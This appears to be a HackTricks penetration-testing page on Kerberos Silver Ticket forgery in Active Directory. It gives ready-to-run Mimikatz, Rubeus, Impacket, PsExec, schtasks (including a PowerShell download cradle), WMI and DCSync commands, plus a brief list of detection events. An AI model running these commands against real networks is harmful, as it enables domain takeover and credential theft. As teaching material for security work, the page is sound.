# Silver Ticket
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If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). {% embed url="https://www.stmcyber.com/careers" %} ## Silver ticket The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user**. In this case, the NTLM **hash of a computer account** (which is kind of a user account in AD) is **owned**. Hence, it is possible to **craft** a **ticket** in order to **get into that machine** with **administrator** privileges through the SMB service. The computer accounts reset their passwords every 30 days by default. It also must be taken into account that it is possible AND **PREFERABLE** (opsec) to **forge tickets using the AES Kerberos keys (AES128 and AES256)**. To know how to generate an AES key read: [section 4.4 of MS-KILE](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625) or the [Get-KerberosAESKey.ps1](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372). {% code title="Linux" %} ```bash python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park stegosaurus export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass ``` {% endcode %} In Windows, **Mimikatz** can be used to **craft** the **ticket**. Next, the ticket is **injected** with **Rubeus**, and finally a remote shell can be obtained thanks to **PsExec**. {% code title="Windows" %} ```bash #Create the ticket mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park" #Inject in memory using mimikatz or Rubeus mimikatz.exe "kerberos::ptt ticket.kirbi" .\Rubeus.exe ptt /ticket:ticket.kirbi #Obtain a shell .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd #Example using aes key kerberos::golden /user:Administrator /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /target:labwws02.jurassic.park /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi ``` {% endcode %} The **CIFS** service is the one that allows you to **access the file system of the victim**. You can find other services here: [**https://adsecurity.org/?page\_id=183**](https://adsecurity.org/?page\_id=183)**.** For example, you can use the **HOST service** to create a _**schtask**_ in a computer. Then you can check if this has worked trying to list the tasks of the victim: `schtasks /S ` or you can use the **HOST and** **RPCSS service** to execute **WMI** queries in a computer, test it doing: `Get-WmiObject -Class win32_operatingsystem -ComputerName ` ### Mitigation Silver ticket events ID (more stealth than golden ticket): * 4624: Account Logon * 4634: Account Logoff * 4672: Admin Logon [**More information about Silver Tickets in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets) ## Available Services | Service Type | Service Silver Tickets | | ------------------------------------------ | -------------------------------------------------------------------------- | | WMI |



| | PowerShell Remoting |



Depending on OS also:



| | WinRM |



In some occasions you can just ask for: WINRM

| | Scheduled Tasks | HOST | | Windows File Share, also psexec | CIFS | | LDAP operations, included DCSync | LDAP | | Windows Remote Server Administration Tools |




| | Golden Tickets | krbtgt | Using **Rubeus** you may **ask for all** these tickets using the parameter: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ## Abusing Service tickets In the following examples lets imagine that the ticket is retrieved impersonating the administrator account. ### CIFS With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**: {% content-ref url="../ntlm/psexec-and-winexec.md" %} [psexec-and-winexec.md](../ntlm/psexec-and-winexec.md) {% endcontent-ref %} ### HOST With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS With these tickets you can **execute WMI in the victim system**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Find **more information about wmiexec** in the following page: {% content-ref url="../ntlm/wmicexec.md" %} [wmicexec.md](../ntlm/wmicexec.md) {% endcontent-ref %} ### HOST + WSMAN (WINRM) With winrm access over a computer you can **access it** and even get a PowerShell: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Check the following page to learn **more ways to connect with a remote host using winrm**: {% content-ref url="../ntlm/winrm.md" %} [winrm.md](../ntlm/winrm.md) {% endcontent-ref %} {% hint style="warning" %} Note that **winrm must be active and listening** on the remote computer to access it. {% endhint %} ### LDAP With this privilege you can dump the DC database using **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Learn more about DCSync** in the following page: {% content-ref url="dcsync.md" %} [dcsync.md](dcsync.md) {% endcontent-ref %} If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). {% embed url="https://www.stmcyber.com/careers" %}
🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.